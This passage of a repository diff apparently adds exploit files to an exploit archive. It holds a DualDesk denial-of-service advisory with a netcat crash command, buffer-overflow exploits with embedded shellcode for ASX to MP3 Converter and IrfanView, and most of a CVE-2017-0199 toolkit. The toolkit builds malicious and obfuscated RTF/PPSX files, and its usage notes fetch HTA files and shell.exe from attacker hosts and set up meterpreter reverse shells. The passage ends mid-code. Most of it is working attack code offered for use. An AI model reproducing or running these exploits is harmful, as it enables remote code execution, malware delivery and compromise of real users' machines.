Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

85
exploits/windows/dos/44222.txt Normal file
View file

@ -0,0 +1,85 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
===============
www.dualdesk.com
Product:
===========
DualDesk v20
DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your
technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no
configuration.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2018-7583
Security Issue:
================
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application
which listens on TCP Port 5500 by sending a long string of junk chars.
(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404 add esp,4
Exploit/POC:
=============
Start the Dualdesk Run Proxy as Application.
C:\>python -c "print 'a'*8000" > crash.txt
C:\>type crash.txt | nc.exe localhost 5500
Crash!!!
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

65
exploits/windows/local/38457.c Normal file
View file

@ -0,0 +1,65 @@
/*
ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/
#include <stdio.h>
#include <windows.h>
#include <malloc.h>
int main() {
int i;
char *overwrite_offset = malloc(255);
for(i = 0; i < 255; i += 5) {
char padding[] = "\x41\x41\x41\x41\x41";
memcpy(overwrite_offset + i, padding, strlen(padding));
}
memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);
char retn[] = "\x92\x72\x23\x74";
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
"\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
"\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
"\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
"\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
"\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
"\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
"\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
"\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
"\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
"\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
"\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
"\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
"\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
"\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
"\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
"\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
"\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
"\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
"\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
"\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
"\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
"\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
"\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
"\x30\xea\x7f\x0e\x30\x3f";
int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
char *buffer = malloc(buffer_size);
memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
memset(buffer + buffer_size - 1, 0x00, 1);
FILE * fp;
fp = fopen("exploit.asx","w");
fprintf(fp, buffer);
fclose(fp);
return 0;
}

59
exploits/windows/local/44217.py Executable file
View file

@ -0,0 +1,59 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#
filename="irfan.txt"
junk = "\x41"*1236
#jump 6
nseh = "\xeb\x06\x90\x90"
#0x10021420 : pop ebp # pop ebx # ret
seh = "\x20\x14\x02\x10"
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c
#Payload size: 220 bytes
calc = (
"\xda\xdf\xba\x32\x98\xc1\x8e\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\x26\x7a\x34\x72\xae\xf8"
"\xb7\x8b\x2e\x9d\x3e\x6e\x1f\x9d\x25\xfa\x0f\x2d\x2d\xae\xa3"
"\xc6\x63\x5b\x30\xaa\xab\x6c\xf1\x01\x8a\x43\x02\x39\xee\xc2"
"\x80\x40\x23\x25\xb9\x8a\x36\x24\xfe\xf7\xbb\x74\x57\x73\x69"
"\x69\xdc\xc9\xb2\x02\xae\xdc\xb2\xf7\x66\xde\x93\xa9\xfd\xb9"
"\x33\x4b\xd2\xb1\x7d\x53\x37\xff\x34\xe8\x83\x8b\xc6\x38\xda"
"\x74\x64\x05\xd3\x86\x74\x41\xd3\x78\x03\xbb\x20\x04\x14\x78"
"\x5b\xd2\x91\x9b\xfb\x91\x02\x40\xfa\x76\xd4\x03\xf0\x33\x92"
"\x4c\x14\xc5\x77\xe7\x20\x4e\x76\x28\xa1\x14\x5d\xec\xea\xcf"
"\xfc\xb5\x56\xa1\x01\xa5\x39\x1e\xa4\xad\xd7\x4b\xd5\xef\xbd"
"\x8a\x6b\x8a\xf3\x8d\x73\x95\xa3\xe5\x42\x1e\x2c\x71\x5b\xf5"
"\x09\x8d\x11\x54\x3b\x06\xfc\x0c\x7e\x4b\xff\xfa\xbc\x72\x7c"
"\x0f\x3c\x81\x9c\x7a\x39\xcd\x1a\x96\x33\x5e\xcf\x98\xe0\x5f"
"\xda\xfa\x67\xcc\x86\xd2\x02\x74\x2c\x2b")
fill = "\x44"*1000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

75
exploits/windows/local/44218.py Executable file
View file

@ -0,0 +1,75 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.50 Email PlugIn - Local Buffer Overflow (SEH Unicode)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.50 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.50
# Software Link: http://www.irfanview.info/files/irfanview_450.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_450.zip
# Tested Windows 7 SP1 x86
#
# More reliable result if .NET and updates installed prior to application being installed
#
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
# ****if calc doesn't pop on first try, repeat steps 2-4 until it does :/
#
filename="irfan.txt"
#junk to offset
junk = "\x41"*262
#popad
nseh = "\x61\x62"
#0x00500102 pop esi pop ebx ret
#unicode possible ansi transform(s) : 0050008A->00500106,ascii {PAGE_EXECUTE_READ} [i_view32.exe]
seh = "\x8a\x50"
valign = (
"\x55" #push ebp
"\x47" #align
"\x58" #pop eax
"\x47" #align
"\x05\x14\x11" #add eax,400
"\x47" #align
"\x2d\x13\x11" #sub eax,300
"\x47" #align
"\x50" #push eax
"\x47" #align
"\xc3" #retn
)
#nops to shellcode
nops = "\x71" * 109
#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ"
"ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHE2KPKPM0C0U9IU01I02D4K0P004"
"K0RLLTK0RLT4KT2NHLOH7OZO601KOVLOLQQSLLBNLMPWQHOLMM197K2KBQB0WTK0RN0DKPJOLDK0LLQR"
"XIS18M1J121TK1IMPKQYC4KPILXJCOJQ9TKOD4KKQ8VP1KOFL91XOLMM1WWP8IPD5ZVLCCMKHOKSMO42"
"UK428DKPXNDM1ICBFTKLLPKDKB8MLM19CDKLD4KKQHP3YQ4O4MTQKQK1Q291JPQKOIP1OQOPZ4KLRJK4M"
"1MRJM14MU5WBM0M0M0R0QX014K2OTGKO9EGKL06UFBB6C85VF5GM5MKOJ5OLKVSLKZE0KKIPBUM57KQ7M"
"CSB2ORJM0PSKOIEBCC1BL1SNN2E2XC5M0AA"
)
#necessary fill
fill = "\x71"*1000
buffer = junk + nseh + seh + valign + nops + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

492
exploits/windows/remote/41894.py
View file

@ -1,103 +1,16 @@
#!/usr/bin/env python
'''
## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ##
## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.
### Video tutorial
https://youtu.be/42LjG7bAvpg
### Release note:
Introduced following capabilities to the script
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13
### Future release:
Working on following feature
- Automatically send generated malicious RTF to victim using email spoofing
### Example:
- Step 1: Generate malicious RTF file using following command and send it to victim
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
- Step 3: Start toolkit in exploitation mode to deliver payloads
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
### Command line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41894.zip
'''
import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo
import os,sys,thread,socket,sys,getopt
BACKLOG = 50 # how many pending connections queue will hold
MAX_DATA_RECV = 999999 # max number of bytes we receive at once
@ -110,35 +23,47 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
global custom
global mode
global obfuscate
global payloadtype
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
custom = ''
port = int("80")
host = ''
mode = ''
obfuscate = int("0")
payloadtype = 'rtf'
# Capture command line arguments
try:
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="])
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="])
except getopt.GetoptError:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n"
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n"
print "Modes:\n"
print " -M gen Generate Malicious RTF file only\n"
print " Generate malicious RTF file:\n"
print " -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n"
print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n"
print " will be requested once victim will open malicious RTF file.\n"
print " -M gen Generate Malicious file only\n"
print " Generate malicious payload:\n"
print " -w <Filename.rtf/Filename.ppsx> Name of malicious RTF/PPSX file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n"
print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n"
print " will be requested once victim will open malicious RTF/PPSX file.\n"
print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n"
print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " -M exp Start exploitation mode\n"
print " Exploitation:\n"
print " -p <TCP port:Default 80> Local port number.\n"
print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n"
print " -H </tmp/custom> Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n"
print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n"
print " -p <TCP port:Default 80> Local port number.\n"
print " -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n"
print " -l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).\n"
print " -l </tmp/shell.exe> If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.\n"
sys.exit()
elif opt in ("-M","--mode"):
mode = arg
@ -152,6 +77,12 @@ def main(argv):
payloadurl = arg
elif opt in ("-l", "--payloadlocation"):
payloadlocation = arg
elif opt in ("-H","--custom"):
custom = arg
elif opt in ("-x","--obfuscate"):
obfuscate = int(arg)
elif opt in ("-t","--payloadtype"):
payloadtype = arg
if "gen" in mode:
if (len(filename)<1):
print 'Usage: python '+sys.argv[0]+' -h'
@ -159,24 +90,63 @@ def main(argv):
if (len(docuri)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Generating payload"
generate_exploit_rtf()
if (len(payloadtype)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if payloadtype.upper() == 'RTF':
if obfuscate == 1:
print "Generating obfuscated RTF file.\n"
generate_exploit_obfuscate_rtf()
sys.exit()
if obfuscate == 0:
print "Generating normal RTF payload.\n"
generate_exploit_rtf()
sys.exit()
sys.exit()
if payloadtype.upper() == 'PPSX':
print "Generating normal PPSX payload.\n"
generate_exploit_ppsx()
sys.exit()
if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX':
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
mode = 'Finished'
if "exp" in mode:
if (len(payloadurl)<1):
if payloadtype.upper() == 'RTF':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
exploitation_rtf()
mode = 'Finished'
if payloadtype.upper() == 'PPSX':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect"
exploitation_ppsx()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadlocation)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Running exploit mode - waiting for victim to connect"
exploitation()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
def generate_exploit_rtf():
# Preparing malicious Doc
# Preparing malicious RTF
s = docuri
docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s)
docuri_pad_len = 224 - len(docuri_hex)
@ -221,7 +191,181 @@ def generate_exploit_rtf():
f.close()
print "Generated "+filename+" successfully"
def exploitation():
def generate_exploit_obfuscate_rtf():
# Preparing malicious obfuscated RTF
var1 = " "
var2 = "\r\n"
var3 = "\t"
var4 = ''.join(choice(ascii_uppercase) for i in range(randint(3,10)))
var5 = "{\*\\"+var4+"}"
var6 = binascii.b2a_hex(os.urandom(15))
#var6 = "0011002e1faa"
s = docuri
docuri_hex = "00".join("{:02x}".format(ord(c)) for c in s)
docuri_pad_len = 224 - len(docuri_hex)
docuri_pad = "0"*docuri_pad_len
new_docuri_hex = docuri_hex.replace('00', '{\*\\'+var6+'}00')
uri_hex = "010000020900000001000000000000000000000000000000a4000000"+"e"+var5*randint(0,10)+"0"+var5*randint(0,10)+"c"+var5*randint(0,10)+"9"+var5*randint(0,10)+"e"+var5*randint(0,10)+"a"+var5*randint(0,10)+"7"+var5*randint(0,10)+"9"+var5*randint(0,10)+"f"+var5*randint(0,10)+"9"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"c"+var5*randint(0,10)+"e"+var5*randint(0,10)+"1"+var5*randint(0,10)+"1"+var5*randint(0,10)+"8"+var5*randint(0,10)+"c"+var5*randint(0,10)+"8"+var5*randint(0,10)+"2"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"a"+var5*randint(0,10)+"a"+var5*randint(0,10)+"0"+var5*randint(0,10)+"0"+var5*randint(0,10)+"4"+var5*randint(0,10)+"b"+var5*randint(0,10)+"a"+var5*randint(0,10)+"9"+var5*randint(0,10)+"0"+var5*randint(0,10)+"b"+var5*randint(0,10)+"8c000000"+new_docuri_hex+docuri_pad+"00000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff0609020000000000c00000000000004600000000ffffffff0000000000000000906660a637b5d201000000000000000000000000000000000000000000000000100203000d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
payload = "{\\rtv0"+var1*randint(0,100)+"\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff31507\\deff0\\stshfdbch31505\\stshfloch31506\\stshfhich31506\\stshfbi31507\\deflang1033\\deflangfe2052\\themelang1033\\themelangfe2052\\themelangcs0\n"
payload += "{\\info\n"
payload += "{\\author }\n"
payload += "{\\operator }\n"
payload += "}\n"
payload += "{\\*\\xmlnstbl {\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\n"
payload += "{\n"
payload += "{\\object\\objautlink\\objupdate\\rsltpict\\objw291\\objh230\\objscalex99\\objscaley101\n"
payload += "{\\*\\objclass \\'57\\'6f\\'72\\'64.Document.8}\n"
payload += "{\\*\\objdata 0"+var2*randint(0,10)+var3*randint(0,10)+"1"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"5"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"2"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0"+var2*randint(0,10)+var3*randint(0,10)+"0\n"
payload += "090000004f4c45324c696e6b000000000000000000000a0000\n"
payload += "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d\n"
payload += "6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000\n"
payload += "000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000\n"
payload += "0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000\n"
payload += "00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n"
payload += uri_hex+"\n"
payload += "0105000000000000}\n"
payload += "{\\result {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid1979324 }}}}\n"
payload += "{\\*\\datastore }\n"
payload += "}\n"
f = open(filename, 'w')
f.write(payload)
f.close()
print "Generated obfuscated "+filename+" successfully"
def generate_exploit_ppsx():
# Preparing malicious PPSX
shutil.copy2('template/template.ppsx', filename)
class UpdateableZipFile(ZipFile):
"""
Add delete (via remove_file) and update (via writestr and write methods)
To enable update features use UpdateableZipFile with the 'with statement',
Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
"""
class DeleteMarker(object):
pass
def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
# Init base
super(UpdateableZipFile, self).__init__(file, mode=mode,
compression=compression,
allowZip64=allowZip64)
# track file to override in zip
self._replace = {}
# Whether the with statement was called
self._allow_updates = False
def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
if isinstance(zinfo_or_arcname, ZipInfo):
name = zinfo_or_arcname.filename
else:
name = zinfo_or_arcname
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and name in self.namelist():
temp_file = self._replace[name] = self._replace.get(name,
tempfile.TemporaryFile())
temp_file.write(bytes)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
bytes, compress_type=compress_type)
def write(self, filename, arcname=None, compress_type=None):
arcname = arcname or filename
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and arcname in self.namelist():
temp_file = self._replace[arcname] = self._replace.get(arcname,
tempfile.TemporaryFile())
with open(filename, "rb") as source:
shutil.copyfileobj(source, temp_file)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).write(filename,
arcname=arcname, compress_type=compress_type)
def __enter__(self):
# Allow updates
self._allow_updates = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
